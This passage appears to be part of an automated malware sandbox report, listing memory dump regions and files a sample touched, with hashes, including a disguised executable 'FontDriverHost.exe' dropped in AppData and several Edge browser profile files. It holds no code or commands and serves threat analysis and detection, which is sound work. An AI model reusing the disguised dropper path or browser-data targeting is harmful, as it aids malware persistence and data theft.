| SHA256 | 94285d5919cf2035aa76d97e489427ae42283a4b43ac0b285ec054f9dd4c8e97 |
| SHA512 | c09cf65aed31fc75520828c055f710cfc666f2b3c0bf0598e889ac9bf8867b62be36144d1b530b4cbdd6b984b58d8301fb2ab82accbecfaca30ec3b7c01b7d4e |
memory/6040-221-0x0000000000400000-0x000000000042A000-memory.dmp
memory/6040-225-0x0000000000400000-0x000000000042A000-memory.dmp
C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
| MD5 | 99d123792aabf4008a30d13d0ca3fe06 |
| SHA1 | 7088f0ba46faa5ef7da8ccabd29bf6392e196c2a |
| SHA256 | 9ca2d6fade6fb9b2d29b32d077efc483eb949063a4285b8d135146082fbaf43f |
| SHA512 | 02f4baea45bd1cbd8ce1755da5f087f7569d2f70113d31be42acbec30ce9aa05e900182410e9d57496ba6d68566dfe3f2e9c201d35152f129f2a2c39befeb424 |
memory/4316-230-0x0000000000BA0000-0x0000000000BAA000-memory.dmp
memory/4316-231-0x0000000002E00000-0x0000000002E08000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a0eb2ea9f256535ddde6c960e96f8872 |
| SHA1 | e6f13449ffce0834281c80d688c3ee873c86f8b7 |
| SHA256 | 296abe3c4bb1cd799453d0780b3f995ca271f6e5a10d7531607e2f78acfcf997 |
| SHA512 | 9333690f5d8c446266bb52bcbaffce2334656a55f8424726944162a0f123808cc2ad185e094b9c32122ef762663366b77128579468c2d4e26d68147b109d75ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d0a0df7a2026810044b9927fb49f2adf |
| SHA1 | d66dfa75037d7ce08f26937899b0a1859450a846 |
| SHA256 | 771bdf1acab3394f966b64d4a9446b7bda5c4a2a11b1a6a2c510749985a53245 |
| SHA512 | 78e1c011b593c993e7d6a989e7c4e6d0ea9b941b42fd8df612c9fd126c4aaa9de51aef7df40d3522ab3499c3dd33d00c1571872d72550f5fc69c0789350928b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cfe23f8e6f04d59f41995f561f643633 |
| SHA1 | cf22f2150103a3ce358c17b91d49476c07d8f8d7 |
| SHA256 | 91114cfec81b29b8e2dfa48c07118594f5e3a2f56416abfaf5143077c16d2217 |
| SHA512 | 8af2884502e8c3d5def0de832cc78f517b7c1828d9cd1457fc797f6b60086803e59797434c4ebbe3a0e94bc403a5e189b6984322cfd01d78c5b30ee8d2e194d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe591013.TMP
| MD5 | ce345e883df94651f543875e898858ea |
| SHA1 | e6660f8d0cab643a06caec1de740c26b833f7e4e |
| SHA256 | d32bd16377facf30fdf24c064fdd2cae16460c74a9df038aad21dedcf0e14576 |
| SHA512 | 63a67bac42906b11bab9091b6a731acdbe8243b3ba18aaa1edbfc79b6cf9905a27a8dc29017ccbf487836eca34477c4b0acb9663a2c7318903e0fe0206d925db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d03c974fde7b2e6d4285fed17532490f |
| SHA1 | b3577ff60083ebc9c188138f550ca06814d524de |
| SHA256 | 43116bde7479ec17e2073173ef2bdda70b671e084c62fda88a33d6bd1dce24f0 |
| SHA512 | c42d70c2bc2646f23546a12ddc5658deee613aa60d63d1e63b36159f586b48148d0744fb34d8763c6d7df78ed706eee11d4d3d65638ebed60315a33a2e6bc546 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 69872383ef01d94c198041d7b81ca685 |
| SHA1 | 442ebb59852b4e3249b54fb086f38111c5b8a09d |
| SHA256 | 2141c1bd29b1f0dc4b66bab937939a4378f6acdd0de44f6691bf223a44db5086 |
| SHA512 | 15abee5a3e075d8640a3cf78af02bb8a6fd36adb33c01fb0bffb3764fa6df8e18d49bbd912974466836cec854ada85dea4ffd688838437ce9e82c0f1f2b016a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9d91af46375bc16c62b1ce10c3ff34da |
| SHA1 | 40e0f854bb3c3407854bda55f04370da0bcadb53 |
| SHA256 | cf4a4cf5910367a45e460d68c1bd02830a01ee4ab515bd1384f10074a1d4b340 |
| SHA512 | 3167c4a82b13422beefd9450233f6806faa0421f07efeb5a2893d0044060e582730448a4d761b88c4e8be7a15e7b9b35d3dbff19dd97c7898913ef2985807c67 |